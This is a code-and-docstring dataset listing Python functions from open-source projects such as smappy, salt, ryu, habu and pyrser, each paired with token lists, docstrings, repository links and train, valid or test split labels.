def day_of_year(self): """ Returns the day of the year (1-366). :rtype: int """ k = 1 if self.is_leap_year() else 2 return (275 * self.month) // 9 - k * ((self.month + 9) // 12) + self.day - 30
[ "def", "day_of_year", "(", "self", ")", ":", "k", "=", "1", "if", "self", ".", "is_leap_year", "(", ")", "else", "2", "return", "(", "275", "*", "self", ".", "month", ")", "//", "9", "-", "k", "*", "(", "(", "self", ".", "month", "+", "9", ")...
Returns the day of the year (1-366). :rtype: int
[ "Returns", "the", "day", "of", "the", "year", "(", "1", "-", "366", ")", "." ]
python
train
EnergieID/smappy
smappy/smappy.py
https://github.com/EnergieID/smappy/blob/1ada3abc9a51c76205c072369258f6f4f4e8fd0f/smappy/smappy.py#L314-L333
def actuator_on(self, service_location_id, actuator_id, duration=None): """ Turn actuator on Parameters ---------- service_location_id : int actuator_id : int duration : int, optional 300,900,1800 or 3600 , specifying the time in seconds the actuator should be turned on. Any other value results in turning on for an undetermined period of time. Returns ------- requests.Response """ return self._actuator_on_off( on_off='on', service_location_id=service_location_id, actuator_id=actuator_id, duration=duration)
[ "def", "actuator_on", "(", "self", ",", "service_location_id", ",", "actuator_id", ",", "duration", "=", "None", ")", ":", "return", "self", ".", "_actuator_on_off", "(", "on_off", "=", "'on'", ",", "service_location_id", "=", "service_location_id", ",", "actuat...
Turn actuator on Parameters ---------- service_location_id : int actuator_id : int duration : int, optional 300,900,1800 or 3600 , specifying the time in seconds the actuator should be turned on. Any other value results in turning on for an undetermined period of time. Returns ------- requests.Response
[ "Turn", "actuator", "on" ]
python
train
core/uricore
uricore/wkz_urls.py
https://github.com/core/uricore/blob/dc5ef4be7bd93da4c39e5c1cbd1ae4f3ad3f1f2a/uricore/wkz_urls.py#L383-L394
def url_quote(s, charset='utf-8', safe='/:'): """URL encode a single string with a given encoding. :param s: the string to quote. :param charset: the charset to be used. :param safe: an optional sequence of safe characters. """ if isinstance(s, unicode): s = s.encode(charset) elif not isinstance(s, str): s = str(s) return _quote(s, safe=safe)
[ "def", "url_quote", "(", "s", ",", "charset", "=", "'utf-8'", ",", "safe", "=", "'/:'", ")", ":", "if", "isinstance", "(", "s", ",", "unicode", ")", ":", "s", "=", "s", ".", "encode", "(", "charset", ")", "elif", "not", "isinstance", "(", "s", ",...
URL encode a single string with a given encoding. :param s: the string to quote. :param charset: the charset to be used. :param safe: an optional sequence of safe characters.
[ "URL", "encode", "a", "single", "string", "with", "a", "given", "encoding", "." ]
python
train
collectiveacuity/labPack
labpack/records/time.py
https://github.com/collectiveacuity/labPack/blob/52949ece35e72e3cc308f54d9ffa6bfbd96805b8/labpack/records/time.py#L181-L206
def fromEpoch(cls, epoch_time): ''' a method for constructing a labDT object from epoch timestamp :param epoch_time: number with epoch timestamp info :return: labDT object ''' # validate input title = 'Epoch time input for labDT.fromEpoch' if not isinstance(epoch_time, float) and not isinstance(epoch_time, int): raise TypeError('\n%s must be an integer or float.' % title) # construct labDT from epoch time dT = datetime.utcfromtimestamp(epoch_time).replace(tzinfo=pytz.utc) dt_kwargs = { 'year': dT.year, 'month': dT.month, 'day': dT.day, 'hour': dT.hour, 'minute': dT.minute, 'second': dT.second, 'microsecond': dT.microsecond, 'tzinfo': dT.tzinfo } return labDT(**dt_kwargs)
[ "def", "fromEpoch", "(", "cls", ",", "epoch_time", ")", ":", "# validate input\r", "title", "=", "'Epoch time input for labDT.fromEpoch'", "if", "not", "isinstance", "(", "epoch_time", ",", "float", ")", "and", "not", "isinstance", "(", "epoch_time", ",", "int", ...
a method for constructing a labDT object from epoch timestamp :param epoch_time: number with epoch timestamp info :return: labDT object
[ "a", "method", "for", "constructing", "a", "labDT", "object", "from", "epoch", "timestamp", ":", "param", "epoch_time", ":", "number", "with", "epoch", "timestamp", "info", ":", "return", ":", "labDT", "object" ]
python
train
shoebot/shoebot
shoebot/data/geometry.py
https://github.com/shoebot/shoebot/blob/d554c1765c1899fa25727c9fc6805d221585562b/shoebot/data/geometry.py#L157-L174
def point_in_polygon(points, x, y): """ Ray casting algorithm. Determines how many times a horizontal ray starting from the point intersects with the sides of the polygon. If it is an even number of times, the point is outside, if odd, inside. The algorithm does not always report correctly when the point is very close to the boundary. The polygon is passed as a list of (x,y)-tuples. """ odd = False n = len(points) for i in range(n): j = i < n - 1 and i + 1 or 0 x0, y0 = points[i][0], points[i][1] x1, y1 = points[j][0], points[j][1] if (y0 < y and y1 >= y) or (y1 < y and y0 >= y): if x0 + (y - y0) / (y1 - y0) * (x1 - x0) < x: odd = not odd return odd
[ "def", "point_in_polygon", "(", "points", ",", "x", ",", "y", ")", ":", "odd", "=", "False", "n", "=", "len", "(", "points", ")", "for", "i", "in", "range", "(", "n", ")", ":", "j", "=", "i", "<", "n", "-", "1", "and", "i", "+", "1", "or", ...
Ray casting algorithm. Determines how many times a horizontal ray starting from the point intersects with the sides of the polygon. If it is an even number of times, the point is outside, if odd, inside. The algorithm does not always report correctly when the point is very close to the boundary. The polygon is passed as a list of (x,y)-tuples.
[ "Ray", "casting", "algorithm", ".", "Determines", "how", "many", "times", "a", "horizontal", "ray", "starting", "from", "the", "point", "intersects", "with", "the", "sides", "of", "the", "polygon", ".", "If", "it", "is", "an", "even", "number", "of", "time...
python
valid
eng-tools/sfsimodels
sfsimodels/models/time.py
https://github.com/eng-tools/sfsimodels/blob/65a690ca440d61307f5a9b8478e4704f203a5925/sfsimodels/models/time.py#L64-L86
def time_indices(npts, dt, start, end, index): """ Determine the new start and end indices of the time series. :param npts: Number of points in original time series :param dt: Time step of original time series :param start: int or float, optional, New start point :param end: int or float, optional, New end point :param index: bool, optional, if False then start and end are considered values in time. :return: tuple, start index, end index """ if index is False: # Convert time values into indices if end != -1: e_index = int(end / dt) + 1 else: e_index = end s_index = int(start / dt) else: s_index = start e_index = end if e_index > npts: raise exceptions.ModelWarning("Cut point is greater than time series length") return s_index, e_index
[ "def", "time_indices", "(", "npts", ",", "dt", ",", "start", ",", "end", ",", "index", ")", ":", "if", "index", "is", "False", ":", "# Convert time values into indices", "if", "end", "!=", "-", "1", ":", "e_index", "=", "int", "(", "end", "/", "dt", ...
Determine the new start and end indices of the time series. :param npts: Number of points in original time series :param dt: Time step of original time series :param start: int or float, optional, New start point :param end: int or float, optional, New end point :param index: bool, optional, if False then start and end are considered values in time. :return: tuple, start index, end index
[ "Determine", "the", "new", "start", "and", "end", "indices", "of", "the", "time", "series", "." ]
python
train
saltstack/salt
salt/modules/zabbix.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/zabbix.py#L1161-L1223
def host_exists(host=None, hostid=None, name=None, node=None, nodeids=None, **kwargs): ''' Checks if at least one host that matches the given filter criteria exists. .. versionadded:: 2016.3.0 :param host: technical name of the host :param hostids: Hosts (hostids) to delete. :param name: visible name of the host :param node: name of the node the hosts must belong to (zabbix API < 2.4) :param nodeids: IDs of the node the hosts must belong to (zabbix API < 2.4) :param _connection_user: Optional - zabbix user (can also be set in opts or pillar, see module's docstring) :param _connection_password: Optional - zabbix password (can also be set in opts or pillar, see module's docstring) :param _connection_url: Optional - url of zabbix frontend (can also be set in opts, pillar, see module's docstring) :return: IDs of the deleted hosts, False on failure. CLI Example: .. code-block:: bash salt '*' zabbix.host_exists 'Zabbix server' ''' conn_args = _login(**kwargs) zabbix_version = apiinfo_version(**kwargs) ret = {} try: if conn_args: # hostgroup.exists deprecated if _LooseVersion(zabbix_version) > _LooseVersion("2.5"): if not host: host = None if not name: name = None if not hostid: hostid = None ret = host_get(host, name, hostid, **kwargs) return bool(ret) # zabbix 2.4 nad earlier else: method = 'host.exists' params = {} if hostid: params['hostid'] = hostid if host: params['host'] = host if name: params['name'] = name # deprecated in 2.4 if _LooseVersion(zabbix_version) < _LooseVersion("2.4"): if node: params['node'] = node if nodeids: params['nodeids'] = nodeids if not hostid and not host and not name and not node and not nodeids: return {'result': False, 'comment': 'Please submit hostid, host, name, node or nodeids parameter to' 'check if at least one host that matches the given filter ' 'criteria exists.'} ret = _query(method, params, conn_args['url'], conn_args['auth']) return ret['result'] else: raise KeyError except KeyError: return ret
[ "def", "host_exists", "(", "host", "=", "None", ",", "hostid", "=", "None", ",", "name", "=", "None", ",", "node", "=", "None", ",", "nodeids", "=", "None", ",", "*", "*", "kwargs", ")", ":", "conn_args", "=", "_login", "(", "*", "*", "kwargs", "...
Checks if at least one host that matches the given filter criteria exists. .. versionadded:: 2016.3.0 :param host: technical name of the host :param hostids: Hosts (hostids) to delete. :param name: visible name of the host :param node: name of the node the hosts must belong to (zabbix API < 2.4) :param nodeids: IDs of the node the hosts must belong to (zabbix API < 2.4) :param _connection_user: Optional - zabbix user (can also be set in opts or pillar, see module's docstring) :param _connection_password: Optional - zabbix password (can also be set in opts or pillar, see module's docstring) :param _connection_url: Optional - url of zabbix frontend (can also be set in opts, pillar, see module's docstring) :return: IDs of the deleted hosts, False on failure. CLI Example: .. code-block:: bash salt '*' zabbix.host_exists 'Zabbix server'
[ "Checks", "if", "at", "least", "one", "host", "that", "matches", "the", "given", "filter", "criteria", "exists", "." ]
python
train
konstantint/matplotlib-venn
matplotlib_venn/_arc.py
https://github.com/konstantint/matplotlib-venn/blob/c26796c9925bdac512edf48387452fbd1848c791/matplotlib_venn/_arc.py#L417-L428
def reversed(self): ''' Returns a copy of this arc, with the direction flipped. >>> Arc((0, 0), 1, 0, 360, True).reversed() Arc([0.000, 0.000], 1.000, 360.000, 0.000, False, degrees=360.000) >>> Arc((0, 0), 1, 175, -175, True).reversed() Arc([0.000, 0.000], 1.000, -175.000, 175.000, False, degrees=10.000) >>> Arc((0, 0), 1, 0, 370, True).reversed() Arc([0.000, 0.000], 1.000, 370.000, 0.000, False, degrees=360.000) ''' return Arc(self.center, self.radius, self.to_angle, self.from_angle, not self.direction)
[ "def", "reversed", "(", "self", ")", ":", "return", "Arc", "(", "self", ".", "center", ",", "self", ".", "radius", ",", "self", ".", "to_angle", ",", "self", ".", "from_angle", ",", "not", "self", ".", "direction", ")" ]
Returns a copy of this arc, with the direction flipped. >>> Arc((0, 0), 1, 0, 360, True).reversed() Arc([0.000, 0.000], 1.000, 360.000, 0.000, False, degrees=360.000) >>> Arc((0, 0), 1, 175, -175, True).reversed() Arc([0.000, 0.000], 1.000, -175.000, 175.000, False, degrees=10.000) >>> Arc((0, 0), 1, 0, 370, True).reversed() Arc([0.000, 0.000], 1.000, 370.000, 0.000, False, degrees=360.000)
[ "Returns", "a", "copy", "of", "this", "arc", "with", "the", "direction", "flipped", ".", ">>>", "Arc", "((", "0", "0", ")", "1", "0", "360", "True", ")", ".", "reversed", "()", "Arc", "(", "[", "0", ".", "000", "0", ".", "000", "]", "1", ".", ...
python
train
ejeschke/ginga
ginga/ImageView.py
https://github.com/ejeschke/ginga/blob/a78c893ec6f37a837de851947e9bb4625c597915/ginga/ImageView.py#L2148-L2157
def set_scale_base_xy(self, scale_x_base, scale_y_base): """Set stretch factors. Parameters ---------- scale_x_base, scale_y_base : float Stretch factors for X and Y, respectively. """ self.t_.set(scale_x_base=scale_x_base, scale_y_base=scale_y_base)
[ "def", "set_scale_base_xy", "(", "self", ",", "scale_x_base", ",", "scale_y_base", ")", ":", "self", ".", "t_", ".", "set", "(", "scale_x_base", "=", "scale_x_base", ",", "scale_y_base", "=", "scale_y_base", ")" ]
Set stretch factors. Parameters ---------- scale_x_base, scale_y_base : float Stretch factors for X and Y, respectively.
[ "Set", "stretch", "factors", "." ]
python
train
gwastro/pycbc
pycbc/inference/io/base_hdf.py
https://github.com/gwastro/pycbc/blob/7a64cdd104d263f1b6ea0b01e6841837d05a4cb3/pycbc/inference/io/base_hdf.py#L787-L809
def write_kwargs_to_attrs(cls, attrs, **kwargs): """Writes the given keywords to the given ``attrs``. If any keyword argument points to a dict, the keyword will point to a list of the dict's keys. Each key is then written to the attrs with its corresponding value. Parameters ---------- attrs : an HDF attrs The ``attrs`` of an hdf file or a group in an hdf file. \**kwargs : The keywords to write. """ for arg, val in kwargs.items(): if val is None: val = str(None) if isinstance(val, dict): attrs[arg] = val.keys() # just call self again with the dict as kwargs cls.write_kwargs_to_attrs(attrs, **val) else: attrs[arg] = val
[ "def", "write_kwargs_to_attrs", "(", "cls", ",", "attrs", ",", "*", "*", "kwargs", ")", ":", "for", "arg", ",", "val", "in", "kwargs", ".", "items", "(", ")", ":", "if", "val", "is", "None", ":", "val", "=", "str", "(", "None", ")", "if", "isinst...
Writes the given keywords to the given ``attrs``. If any keyword argument points to a dict, the keyword will point to a list of the dict's keys. Each key is then written to the attrs with its corresponding value. Parameters ---------- attrs : an HDF attrs The ``attrs`` of an hdf file or a group in an hdf file. \**kwargs : The keywords to write.
[ "Writes", "the", "given", "keywords", "to", "the", "given", "attrs", "." ]
python
train
jeffh/sniffer
sniffer/runner.py
https://github.com/jeffh/sniffer/blob/8e4c3e77743aef08109ea0225b4a6536d4e60270/sniffer/runner.py#L68-L76
def absorb_args(self, func): """ Calls a function without any arguments. The returned caller function accepts any arguments (and throws them away). """ @wraps(func) def wrapper(*args, **kwargs): return func() return wrapper
[ "def", "absorb_args", "(", "self", ",", "func", ")", ":", "@", "wraps", "(", "func", ")", "def", "wrapper", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "return", "func", "(", ")", "return", "wrapper" ]
Calls a function without any arguments. The returned caller function accepts any arguments (and throws them away).
[ "Calls", "a", "function", "without", "any", "arguments", ".", "The", "returned", "caller", "function", "accepts", "any", "arguments", "(", "and", "throws", "them", "away", ")", "." ]
python
train
portantier/habu
habu/cli/cmd_whois_ip.py
https://github.com/portantier/habu/blob/87091e389dc6332fe1b82830c22b2eefc55816f2/habu/cli/cmd_whois_ip.py#L12-L36
def cmd_whois_ip(ip): """Simple whois client to check IP addresses (IPv4 and IPv6). Example: \b $ habu.whois.ip 8.8.8.8 { "nir": null, "asn_registry": "arin", "asn": "15169", "asn_cidr": "8.8.8.0/24", "asn_country_code": "US", "asn_date": "1992-12-01", "asn_description": "GOOGLE - Google LLC, US", "query": "8.8.8.8", ... """ warnings.filterwarnings("ignore") obj = IPWhois(ip) data = obj.lookup_rdap() print(json.dumps(data, indent=4))
[ "def", "cmd_whois_ip", "(", "ip", ")", ":", "warnings", ".", "filterwarnings", "(", "\"ignore\"", ")", "obj", "=", "IPWhois", "(", "ip", ")", "data", "=", "obj", ".", "lookup_rdap", "(", ")", "print", "(", "json", ".", "dumps", "(", "data", ",", "ind...
Simple whois client to check IP addresses (IPv4 and IPv6). Example: \b $ habu.whois.ip 8.8.8.8 { "nir": null, "asn_registry": "arin", "asn": "15169", "asn_cidr": "8.8.8.0/24", "asn_country_code": "US", "asn_date": "1992-12-01", "asn_description": "GOOGLE - Google LLC, US", "query": "8.8.8.8", ...
[ "Simple", "whois", "client", "to", "check", "IP", "addresses", "(", "IPv4", "and", "IPv6", ")", "." ]
python
train
osrg/ryu
ryu/lib/lacplib.py
https://github.com/osrg/ryu/blob/6f906e72c92e10bd0264c9b91a2f7bb85b97780c/ryu/lib/lacplib.py#L73-L94
def add(self, dpid, ports): """add a setting of a bonding i/f. 'add' method takes the corresponding args in this order. ========= ===================================================== Attribute Description ========= ===================================================== dpid datapath id. ports a list of integer values that means the ports face with the slave i/fs. ========= ===================================================== if you want to use multi LAG, call 'add' method more than once. """ assert isinstance(ports, list) assert len(ports) >= 2 ifs = {} for port in ports: ifs[port] = {'enabled': False, 'timeout': 0} bond = {dpid: ifs} self._bonds.append(bond)
[ "def", "add", "(", "self", ",", "dpid", ",", "ports", ")", ":", "assert", "isinstance", "(", "ports", ",", "list", ")", "assert", "len", "(", "ports", ")", ">=", "2", "ifs", "=", "{", "}", "for", "port", "in", "ports", ":", "ifs", "[", "port", ...
add a setting of a bonding i/f. 'add' method takes the corresponding args in this order. ========= ===================================================== Attribute Description ========= ===================================================== dpid datapath id. ports a list of integer values that means the ports face with the slave i/fs. ========= ===================================================== if you want to use multi LAG, call 'add' method more than once.
[ "add", "a", "setting", "of", "a", "bonding", "i", "/", "f", ".", "add", "method", "takes", "the", "corresponding", "args", "in", "this", "order", "." ]
python
train
mushkevych/scheduler
process_starter.py
https://github.com/mushkevych/scheduler/blob/6740331360f49083c208085fb5a60ce80ebf418b/process_starter.py#L10-L47
def get_class(kls): """ :param kls - string of fully identified starter function or starter method path for instance: - workers.abstract_worker.AbstractWorker.start - workers.example_script_worker.main :return tuple (type, object, starter) for instance: - (FunctionType, <function_main>, None) - (type, <Class_...>, 'start') """ parts = kls.split('.') try: # First, try to import module hosting starter function module = '.'.join(parts[:-1]) m = __import__(module) except ImportError: # Alternatively, try to import module hosting Class with a starter method module = '.'.join(parts[:-2]) m = __import__(module) t = None starter = None for i in range(1, len(parts)): comp = parts[i] starter = parts[i:] m = getattr(m, comp) if isinstance(m, class_types): t = type starter = None if len(parts[i:]) == 1 else '.'.join(parts[i + 1:]) break if isinstance(m, types.FunctionType): t = types.FunctionType starter = None break return t, m, starter
[ "def", "get_class", "(", "kls", ")", ":", "parts", "=", "kls", ".", "split", "(", "'.'", ")", "try", ":", "# First, try to import module hosting starter function", "module", "=", "'.'", ".", "join", "(", "parts", "[", ":", "-", "1", "]", ")", "m", "=", ...
:param kls - string of fully identified starter function or starter method path for instance: - workers.abstract_worker.AbstractWorker.start - workers.example_script_worker.main :return tuple (type, object, starter) for instance: - (FunctionType, <function_main>, None) - (type, <Class_...>, 'start')
[ ":", "param", "kls", "-", "string", "of", "fully", "identified", "starter", "function", "or", "starter", "method", "path", "for", "instance", ":", "-", "workers", ".", "abstract_worker", ".", "AbstractWorker", ".", "start", "-", "workers", ".", "example_script...
python
train
LionelAuroux/pyrser
pyrser/type_system/scope.py
https://github.com/LionelAuroux/pyrser/blob/f153a97ef2b6bf915a1ed468c0252a9a59b754d5/pyrser/type_system/scope.py#L180-L184
def union(self, sig: Scope) -> Scope: """ Create a new Set produce by the union of 2 Set """ new = Scope(sig=self._hsig.values(), state=self.state) new |= sig return new
[ "def", "union", "(", "self", ",", "sig", ":", "Scope", ")", "->", "Scope", ":", "new", "=", "Scope", "(", "sig", "=", "self", ".", "_hsig", ".", "values", "(", ")", ",", "state", "=", "self", ".", "state", ")", "new", "|=", "sig", "return", "ne...
Create a new Set produce by the union of 2 Set
[ "Create", "a", "new", "Set", "produce", "by", "the", "union", "of", "2", "Set" ]
python
test